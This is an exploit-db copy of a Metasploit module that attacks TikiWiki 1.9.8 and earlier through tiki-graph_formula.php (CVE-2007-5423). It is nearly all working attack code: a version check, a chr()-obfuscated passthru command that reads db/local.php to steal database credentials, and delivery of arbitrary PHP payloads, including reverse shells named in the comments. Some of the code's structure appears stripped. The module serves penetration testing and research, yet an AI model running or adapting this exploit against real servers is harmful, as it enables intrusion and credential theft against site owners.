TikiWiki tiki-graph_formula – PHP Remote Code Execution (Metasploit)

  • 作者: Metasploit
    日期: 2010-09-20
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/16911/
  • ##
    # $Id: tikiwiki_graph_formula_exec.rb 10394 2010-09-20 08:06:27Z jduck $
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = ExcellentRanking
    	include Msf::Exploit::Remote::HttpClient
    	def initialize(info = {})
    			'Name' => 'TikiWiki tiki-graph_formula Remote PHP Code Execution',
    			'Description'=> %q{
    					TikiWiki (<= 1.9.8) contains a flaw that may allow a remote
    				attacker to execute arbitrary PHP code.The issue is due to
    				'tiki-graph_formula.php' script not properly sanitizing user
    				input supplied to create_function(), which may allow a remote
    				attacker to execute arbitrary PHP code resulting in a loss of
    			'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'jduck' ],
    			'License'=> MSF_LICENSE,
    			'Version'=> '$Revision: 10394 $',
    			'References' =>
    					['CVE', '2007-5423'],
    					['OSVDB', '40478'],
    					['BID', '26006'],
    			'Privileged' => false,
    					'DisableNops' => true,
    					# 6k.Really it's the max length of a URI minus the junk
    					# we have to put in the request to trigger the
    					# vulnerability.On Apache, 8190 is the max, so this
    					# should be a pretty safe value.
    					'Space' => 6144,
    					# Yes, 'x' is a badchar.The vulnerable code replaces it with '$x'.
    					'BadChars'=> "`\"' %&x",
    			'Platform' => 'php',
    			'Arch' => ARCH_PHP,
    			'Targets'=> [[ 'Automatic', { }]],
    			'DisclosureDate' => 'Oct 10 2007',
    			'DefaultTarget'=> 0))
    				OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
    			], self.class)
    	def check
    		res = send_request_raw(
    				'uri' => datastore['URI'] + "/tiki-index.php",
    				'method'=> 'GET',
    				'headers' =>
    						'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    						'Connection' => 'Close',
    			}, 5)
    		http_fingerprint({ :response => res })# check method
    		if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
    			ver = $1
    			#print_status("Detected TikiWiki version #{ver}")
    			ver = ver.split('.')
    			return Exploit::CheckCode::Safe if (ver[0] != '1')
    			return Exploit::CheckCode::Safe if (ver[1] != '9')
    			if (ver.length > 2)
    				ver2 = ver[2].to_i
    				if (ver.length > 3)
    					ver3 = ver[3].to_i
    					ver3 = 0
    				return Exploit::CheckCode::Safe if (ver2 > 8)
    				return Exploit::CheckCode::Safe if (ver2 == 8 and ver3 > 0)
    			return Exploit::CheckCode::Vulnerable
    	def exploit
    		print_status("Attempting to obtain database credentials...")
    		url_db_local = build_uri("passthru(" +
    			"chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89)." +# echo YYY
    			"chr(59)." +# ;
    			# cat db/local.php
    			"chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +
    			"chr(59)." +# ;
    			"chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89)" + # echo YYY
    		res = send_request_raw({
    			'uri' => url_db_local,
    			'method'=> 'GET',
    			'headers' =>
    					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    					'Connection' => 'Close',
    			}, 5)
    		if (res and res.message == "OK" and res.body)
    			print_status("The server returned: #{res.code} #{res.message}")
    			print_status("Server version : #{res.headers['Server']}")
    			db_tiki = res.body.match(/db_tiki='(.*?)';/m)
    			if (db_tiki)
    				dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)
    				host_tiki = res.body.match(/host_tiki='(.*?)';/m)
    				user_tiki = res.body.match(/user_tiki='(.*?)';/m)
    				pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)
    				dbs_tiki= res.body.match(/dbs_tiki='(.*?)';/m)
    				print_status("TikiWiki database informations : \n")
    				print("db_tiki : " + db_tiki[1] + "\n")
    				print("dbversion : " + dbversion[1] + "\n")
    				print("host_tiki : " + host_tiki[1] + "\n")
    				print("user_tiki : " + user_tiki[1] + "\n")
    				print("pass_tiki : " + pass_tiki[1] + "\n")
    				print("dbs_tiki: " + dbs_tiki[1]+ "\n\n")
    			print_status("No response from the server")
    		print_status("Attempting to execute our payload...")
    		command = Rex::Text.uri_encode(payload.encoded)
    		url_cmd = build_uri(payload.encoded)
    		res = send_request_raw({
    			'uri' => url_cmd,
    			'method'=> 'GET',
    			'headers' =>
    					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    					'Connection' => 'Close',
    			}, 5)
    	# This function will build a fairly randomish query string to be used
    	# when exploiting this vulnerability :)
    	def build_uri(f_val)
    		uri = ''
    		uri << datastore['URI']
    		uri << "/tiki-graph_formula.php?"
    		# Requirements:
    		query = ''
    		# 1. w,h,s,min,max must all be numeric
    		vars = %w{ w h s min max }
    		min = nil
    		vars.each { |el|
    			query << "&" if query.length > 0
    			num = 1+rand(999)
    			# 2. min must be less than max
    			case el
    			when 's'
    				num = 1+rand(500)
    			when 'min'
    				if (min)
    					num = min
    					min = num
    			when 'max'
    				min ||= num
    				num = min + 1 + rand(99)
    			query << "#{el}=#{num}"
    		# 3. cannot use `, ', ", or space
    		if (f_val.index('\'') or f_val.index('"') or f_val.index('`') or f_val.index(' '))
    			raise RuntimeError, "The value for the 'f' variable contains an invalid character!"
    		# 4. the function must be one of:
    		valid = %w{
    			abs acos acosh asin asinh atan2 atan atanh ceil cos cosh deg2rad
    			exp expm1 floor fmod hypot log10 log1p log max min pi pow rad2deg round sin
    			sinh sqrt tan tanh
    		func = valid[rand(valid.length)]
    		# 5. f must be an array
    		query << "&" if query.length > 0
    		# Strip off the semi-colon that the encoder insists on including.
    		if f_val[-1,1] == ";"
    			f_val = f_val[0,f_val.length-1]
    		query << "f[]=x.#{func}.#{f_val}"
    		# This doesn't seem to be necessary on PHP 5.2.4, tikiwiki 1.9.5
    		# Tested with php/reverse_php, php/meterpreter_reverse_tcp, and
    		# php/meterpreter/reverse_tcp
    		# If we dont kill php here it spins eating 100% cpu :-/
    		#query << '.die()'
    		# 6. two options for 't' - png and pdf
    		#- png requires php's gd extension
    		#- pdf, if you set 'p', requires php pdf extension
    		#-- we always use 'pdf' with a null 'p'
    		query << "&" if query.length > 0
    		query << 't=pdf'
    		# 7. title must be set
    		query << '&title='
    		uri << query